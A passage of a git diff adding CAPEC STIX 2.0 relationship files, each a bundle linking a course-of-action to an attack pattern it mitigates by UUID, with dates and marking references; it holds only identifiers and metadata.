] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--56fdfa4a-a8bf-4465-b83a-f6c1b7aa029c.json b/capec/relationship/relationship--56fdfa4a-a8bf-4465-b83a-f6c1b7aa029c.json new file mode 100644 index 0000000000..5ce23b777c --- /dev/null +++ b/capec/relationship/relationship--56fdfa4a-a8bf-4465-b83a-f6c1b7aa029c.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--17778786-b8b2-4f9c-b20c-ff798f5383d4", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--56fdfa4a-a8bf-4465-b83a-f6c1b7aa029c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--f8b3b88a-878a-47d2-913c-15849706d1c4", + "target_ref": "attack-pattern--5abb3ee9-40b8-421d-8a13-adce13e62d3c", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--57a612fe-f3fe-4b44-969d-e8caed9ffb73.json b/capec/relationship/relationship--57a612fe-f3fe-4b44-969d-e8caed9ffb73.json new file mode 100644 index 0000000000..cac0024676 --- /dev/null +++ b/capec/relationship/relationship--57a612fe-f3fe-4b44-969d-e8caed9ffb73.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--176f4237-a964-49cf-8fc0-575a2ad7c12b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--57a612fe-f3fe-4b44-969d-e8caed9ffb73", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7766bca9-c0e5-45bf-9e34-c8b1d3df00a1", + "target_ref": "attack-pattern--631027cc-a80a-4768-a4ae-ea7a7484acbd", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--57b4b08f-4086-409c-9edc-2030dfb7466f.json b/capec/relationship/relationship--57b4b08f-4086-409c-9edc-2030dfb7466f.json new file mode 100644 index 0000000000..518c374404 --- /dev/null +++ b/capec/relationship/relationship--57b4b08f-4086-409c-9edc-2030dfb7466f.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--9474d518-eedd-4113-a55d-1714600fda8e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--57b4b08f-4086-409c-9edc-2030dfb7466f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--cd40e6b8-417e-4b69-83c9-03ac287cd752", + "target_ref": "attack-pattern--0cfa0b69-241b-411b-bf20-d4a3b758a672", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--57c1bcea-ed91-4771-83ef-cdbde39d99ec.json b/capec/relationship/relationship--57c1bcea-ed91-4771-83ef-cdbde39d99ec.json new file mode 100644 index 0000000000..b0acb90e2e --- /dev/null +++ b/capec/relationship/relationship--57c1bcea-ed91-4771-83ef-cdbde39d99ec.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--77b6ff5a-d216-4322-a17b-f82f524b84d3", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--57c1bcea-ed91-4771-83ef-cdbde39d99ec", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--9c36c07f-9f02-497b-a549-8418278d8cfc", + "target_ref": "attack-pattern--3a3cdae5-f726-49c5-97d4-30ca8abf42b0", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--57c6bb14-b4fa-4e8f-9852-adede60c8226.json b/capec/relationship/relationship--57c6bb14-b4fa-4e8f-9852-adede60c8226.json new file mode 100644 index 0000000000..0de04adeb7 --- /dev/null +++ b/capec/relationship/relationship--57c6bb14-b4fa-4e8f-9852-adede60c8226.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--0b7ca8b4-f513-445d-8f7c-c4c6b369b8bf", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--57c6bb14-b4fa-4e8f-9852-adede60c8226", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-12-07T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--de6705ec-bc11-4a96-adfa-da407741e58a", + "target_ref": "attack-pattern--48b3fdcc-8514-4c53-bcda-5302b3b71e59", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--57dab16f-1f71-4c18-831b-30cc259ec6f9.json b/capec/relationship/relationship--57dab16f-1f71-4c18-831b-30cc259ec6f9.json new file mode 100644 index 0000000000..4ea5625ec3 --- /dev/null +++ b/capec/relationship/relationship--57dab16f-1f71-4c18-831b-30cc259ec6f9.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--5a537253-7fce-49cd-832f-5dba0c630da7", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--57dab16f-1f71-4c18-831b-30cc259ec6f9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1d71ce40-c669-47a9-b734-e8a4457d41b7", + "target_ref": "attack-pattern--7b38c275-4653-4cef-9a72-cb2d53a1e11e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--57dc1ba3-6dec-4b09-a46d-6b9b8f7065be.json b/capec/relationship/relationship--57dc1ba3-6dec-4b09-a46d-6b9b8f7065be.json new file mode 100644 index 0000000000..1c331ebacc --- /dev/null +++ b/capec/relationship/relationship--57dc1ba3-6dec-4b09-a46d-6b9b8f7065be.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--efe847cc-ba21-4ee0-877f-17dfdbee3df4", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--57dc1ba3-6dec-4b09-a46d-6b9b8f7065be", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bb535ccb-21d3-4027-a4d3-41972fe6bd8f", + "target_ref": "attack-pattern--705249bd-b1ea-4723-bb50-afd62f6bd16e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--57efa208-73e1-4b02-97a8-b3664d6c79aa.json b/capec/relationship/relationship--57efa208-73e1-4b02-97a8-b3664d6c79aa.json new file mode 100644 index 0000000000..f3383d1f4a --- /dev/null +++ b/capec/relationship/relationship--57efa208-73e1-4b02-97a8-b3664d6c79aa.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--1eda064d-4837-43e7-8bd2-99284a1475da", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--57efa208-73e1-4b02-97a8-b3664d6c79aa", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e3d8ccf0-cc09-4101-b905-b95dfa0922fe", + "target_ref": "attack-pattern--ad790f82-30ed-40e5-b718-ea4dda88b232", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--58629d49-751c-4442-a4f8-e8650c594715.json b/capec/relationship/relationship--58629d49-751c-4442-a4f8-e8650c594715.json new file mode 100644 index 0000000000..12fa91567f --- /dev/null +++ b/capec/relationship/relationship--58629d49-751c-4442-a4f8-e8650c594715.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--cf1d831b-e60f-4641-a4e4-47b63780828b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--58629d49-751c-4442-a4f8-e8650c594715", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--95e7a500-58db-4a4b-8516-24b61e683322", + "target_ref": "attack-pattern--11c647fb-33fc-444c-b578-617cb2205def", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--58e5a02d-bb53-48fb-8003-7d5e32bf5226.json b/capec/relationship/relationship--58e5a02d-bb53-48fb-8003-7d5e32bf5226.json new file mode 100644 index 0000000000..2356a326de --- /dev/null +++ b/capec/relationship/relationship--58e5a02d-bb53-48fb-8003-7d5e32bf5226.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--fdaa1843-35ef-4ee5-bed0-9eaed8bcc775", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--58e5a02d-bb53-48fb-8003-7d5e32bf5226", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a52e5a22-834c-49bb-a48c-8ad9bce272be", + "target_ref": "attack-pattern--9c42a1f2-6920-477a-a163-53e2ca9d1c2e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--58ee4fe8-4fab-4910-b709-68fb70ff981b.json b/capec/relationship/relationship--58ee4fe8-4fab-4910-b709-68fb70ff981b.json new file mode 100644 index 0000000000..5c842b0d04 --- /dev/null +++ b/capec/relationship/relationship--58ee4fe8-4fab-4910-b709-68fb70ff981b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--256b9a6d-627b-469a-8a79-27b258dd468f", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--58ee4fe8-4fab-4910-b709-68fb70ff981b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-06T00:00:00.000Z", + "modified": "2017-01-06T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--15af2ba6-0fe3-42ae-aa07-efeaba06d2d6", + "target_ref": "attack-pattern--9e330dfb-4bb5-4c37-8982-c931dbc285cb", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--5944cffe-d0fc-4ca9-8b0b-b3e877e439fe.json b/capec/relationship/relationship--5944cffe-d0fc-4ca9-8b0b-b3e877e439fe.json new file mode 100644 index 0000000000..e959a53efa --- /dev/null +++ b/capec/relationship/relationship--5944cffe-d0fc-4ca9-8b0b-b3e877e439fe.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--7c46a7c4-e56f-4aab-90be-92c33e8b36b3", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--5944cffe-d0fc-4ca9-8b0b-b3e877e439fe", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f26db10-8931-420a-9894-08ba87d842af", + "target_ref": "attack-pattern--83c111d0-0f3e-422c-ac73-819d29403c64", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--59760aef-867c-4ae8-b3ad-56fae9788f7a.json b/capec/relationship/relationship--59760aef-867c-4ae8-b3ad-56fae9788f7a.json new file mode 100644 index 0000000000..c3b750e6c3 --- /dev/null +++ b/capec/relationship/relationship--59760aef-867c-4ae8-b3ad-56fae9788f7a.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d84bcacf-ba74-4e30-816b-8c2a4194cff5", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--59760aef-867c-4ae8-b3ad-56fae9788f7a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0b8e6f93-072a-40f9-b438-9618b0494301", + "target_ref": "attack-pattern--d01b1014-6dd4-42b3-92c4-ec82745071e8", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--598d9026-5333-4e2a-9077-8a53f6171f24.json b/capec/relationship/relationship--598d9026-5333-4e2a-9077-8a53f6171f24.json new file mode 100644 index 0000000000..b5024706f4 --- /dev/null +++ b/capec/relationship/relationship--598d9026-5333-4e2a-9077-8a53f6171f24.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--4e2ffd4a-dd31-410c-8218-2da069ff6b24", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--598d9026-5333-4e2a-9077-8a53f6171f24", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--69eb9c90-2ae5-4bab-aca8-b86865b9f811", + "target_ref": "attack-pattern--3ba1113c-b544-4d3a-8493-7da4240f935e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--5ab822cf-4232-4248-aeb8-8ab2a78b1671.json b/capec/relationship/relationship--5ab822cf-4232-4248-aeb8-8ab2a78b1671.json new file mode 100644 index 0000000000..a3cbcdbaf1 --- /dev/null +++ b/capec/relationship/relationship--5ab822cf-4232-4248-aeb8-8ab2a78b1671.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--a934b3b3-d884-4e24-8c1c-ef9699e1598a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--5ab822cf-4232-4248-aeb8-8ab2a78b1671", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-04T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e179c216-27fd-4547-9dce-78b800823e09", + "target_ref": "attack-pattern--67b5679d-1866-4df2-952d-b26985bd3651", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--5af295c0-cc26-47df-aabd-6091ac0f4867.json b/capec/relationship/relationship--5af295c0-cc26-47df-aabd-6091ac0f4867.json new file mode 100644 index 0000000000..0c2f0404ab --- /dev/null +++ b/capec/relationship/relationship--5af295c0-cc26-47df-aabd-6091ac0f4867.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--a9a1bf4a-5d21-4faf-9d47-b5fa63ad8a86", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--5af295c0-cc26-47df-aabd-6091ac0f4867", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--6c587fe5-89a0-42b2-a2ff-ef9b15773cf7", + "target_ref": "attack-pattern--34578435-31bc-4c4d-bb0a-61a3ab909633", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--5b406ca0-fcc2-4dbf-8c07-60b9e727fafa.json b/capec/relationship/relationship--5b406ca0-fcc2-4dbf-8c07-60b9e727fafa.json new file mode 100644 index 0000000000..33287c5c0a --- /dev/null +++ b/capec/relationship/relationship--5b406ca0-fcc2-4dbf-8c07-60b9e727fafa.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--b08159f7-2385-48f2-a44e-442a8ec9baca", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--5b406ca0-fcc2-4dbf-8c07-60b9e727fafa", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--518cd53f-cc9a-4c07-83d9-cefd812eddc3", + "target_ref": "attack-pattern--71dbbb97-42e8-4d9b-aadf-35f06a2beb57", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--5c02a22b-6aea-4603-8d2c-5eb93c5a45c5.json b/capec/relationship/relationship--5c02a22b-6aea-4603-8d2c-5eb93c5a45c5.json new file mode 100644 index 0000000000..dea619e3fd --- /dev/null +++ b/capec/relationship/relationship--5c02a22b-6aea-4603-8d2c-5eb93c5a45c5.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--820dd434-a5ea-4ebf-9f27-55549839582f", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--5c02a22b-6aea-4603-8d2c-5eb93c5a45c5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bf09c080-4504-4328-ad60-28b0e4364df5", + "target_ref": "attack-pattern--289251fd-9402-48a7-aee0-28b8ba2b3e41", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--5d0a2538-e498-469d-a298-8e36a20d5a91.json b/capec/relationship/relationship--5d0a2538-e498-469d-a298-8e36a20d5a91.json new file mode 100644 index 0000000000..0618505bd2 --- /dev/null +++ b/capec/relationship/relationship--5d0a2538-e498-469d-a298-8e36a20d5a91.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--7cbdc18d-f58e-42c6-bf58-1540c40e5243", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--5d0a2538-e498-469d-a298-8e36a20d5a91", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5f1774e8-9dca-4cd7-820a-f1e7a4c29bb2", + "target_ref": "attack-pattern--03947e14-b3b5-4838-823c-0af6f255c25a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--5d249d82-dbd1-4077-8174-67cb7b52a06d.json b/capec/relationship/relationship--5d249d82-dbd1-4077-8174-67cb7b52a06d.json new file mode 100644 index 0000000000..681ac547cd --- /dev/null +++ b/capec/relationship/relationship--5d249d82-dbd1-4077-8174-67cb7b52a06d.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--bcb30419-5312-4c7e-9613-95cdc4d34727", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--5d249d82-dbd1-4077-8174-67cb7b52a06d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--3961c98f-bbcb-4b45-8a65-b5a2e37909cf", + "target_ref": "attack-pattern--e372df87-d117-476a-907d-0372310c2414", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--5d78debf-8201-4100-b658-aaa763cd154e.json b/capec/relationship/relationship--5d78debf-8201-4100-b658-aaa763cd154e.json new file mode 100644 index 0000000000..fbe48cf118 --- /dev/null +++ b/capec/relationship/relationship--5d78debf-8201-4100-b658-aaa763cd154e.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--80cae546-09a1-456a-837f-774d857736bf", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--5d78debf-8201-4100-b658-aaa763cd154e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--8afa62f1-9290-43b7-b133-9f3d1936db73", + "target_ref": "attack-pattern--ae26a24f-24e3-4a3d-a967-473bfbaac369", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--5e94abf8-fdbc-4b80-ae54-bd12dc2c72dc.json b/capec/relationship/relationship--5e94abf8-fdbc-4b80-ae54-bd12dc2c72dc.json new file mode 100644 index 0000000000..65c982fc6f --- /dev/null +++ b/capec/relationship/relationship--5e94abf8-fdbc-4b80-ae54-bd12dc2c72dc.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--bc75f46f-22cb-48d2-b28d-6f5e7ddf636a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--5e94abf8-fdbc-4b80-ae54-bd12dc2c72dc", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ae94d088-b630-4a15-b1f7-193cf9d7408e", + "target_ref": "attack-pattern--482b3970-03d2-4537-a2db-09570ed891e7", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--5f4deeb9-ea0e-469e-b10a-3308228d5b04.json b/capec/relationship/relationship--5f4deeb9-ea0e-469e-b10a-3308228d5b04.json new file mode 100644 index 0000000000..ae8dc51baa --- /dev/null +++ b/capec/relationship/relationship--5f4deeb9-ea0e-469e-b10a-3308228d5b04.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--03571ed1-c5ea-44d3-b37e-f205ec067647", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--5f4deeb9-ea0e-469e-b10a-3308228d5b04", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--51032946-3d2e-4baa-a10d-aa22a01421b3", + "target_ref": "attack-pattern--5000f07d-b0e2-48cc-bd4e-5149fa707e75", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--5f6fa659-4938-4749-a3cd-614942f7e23c.json b/capec/relationship/relationship--5f6fa659-4938-4749-a3cd-614942f7e23c.json new file mode 100644 index 0000000000..aa8339a596 --- /dev/null +++ b/capec/relationship/relationship--5f6fa659-4938-4749-a3cd-614942f7e23c.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--b12fc02e-33af-45e5-a621-79f9e12e0aa3", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--5f6fa659-4938-4749-a3cd-614942f7e23c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2019-04-04T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ab2e7084-d1f5-4fc5-be64-f737db34936f", + "target_ref": "attack-pattern--d39afdc9-d913-4686-a5f8-e4ab56eec66e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--5f8e2177-5722-41bc-a65c-c3ce8e7ecf10.json b/capec/relationship/relationship--5f8e2177-5722-41bc-a65c-c3ce8e7ecf10.json new file mode 100644 index 0000000000..c7a8ac0f26 --- /dev/null +++ b/capec/relationship/relationship--5f8e2177-5722-41bc-a65c-c3ce8e7ecf10.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--6ff0eddb-7522-4f7d-8990-2969ed4e9dd9", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--5f8e2177-5722-41bc-a65c-c3ce8e7ecf10", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--8fba3d61-e6ad-4c00-8670-50ffb8714714", + "target_ref": "attack-pattern--465538b7-66d8-47e7-8aa8-e62d380101b1", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--5fb0e4ef-710f-4a96-9b25-ca14dae5dadc.json b/capec/relationship/relationship--5fb0e4ef-710f-4a96-9b25-ca14dae5dadc.json new file mode 100644 index 0000000000..c6d36caaec --- /dev/null +++ b/capec/relationship/relationship--5fb0e4ef-710f-4a96-9b25-ca14dae5dadc.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c82819ea-662c-4292-84fd-e567856a873f", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--5fb0e4ef-710f-4a96-9b25-ca14dae5dadc", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--951c7f78-c8d9-4d78-a0d2-522108019a8f", + "target_ref": "attack-pattern--341c4200-549a-4cef-b4d7-347bf2e55baa", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--608ce1fc-ad7d-4ce8-a477-e5fa826b090f.json b/capec/relationship/relationship--608ce1fc-ad7d-4ce8-a477-e5fa826b090f.json new file mode 100644 index 0000000000..0a0b5fb13a --- /dev/null +++ b/capec/relationship/relationship--608ce1fc-ad7d-4ce8-a477-e5fa826b090f.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--a95c4e0d-989f-443e-935a-f6bf373295d9", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--608ce1fc-ad7d-4ce8-a477-e5fa826b090f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-12T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--b22c39d0-819a-48ba-acab-755e7b77ac3e", + "target_ref": "attack-pattern--f0bd351b-636b-4299-bf9c-6a27b6301776", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--60a630e6-d81a-445a-9fba-4432985034eb.json b/capec/relationship/relationship--60a630e6-d81a-445a-9fba-4432985034eb.json new file mode 100644 index 0000000000..e8ef400ac9 --- /dev/null +++ b/capec/relationship/relationship--60a630e6-d81a-445a-9fba-4432985034eb.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--6d6ca21f-c9d6-4a79-a871-e6f3a1b70108", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--60a630e6-d81a-445a-9fba-4432985034eb", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ad1abb2c-832c-4bcf-bf0a-dd8768b9ed5a", + "target_ref": 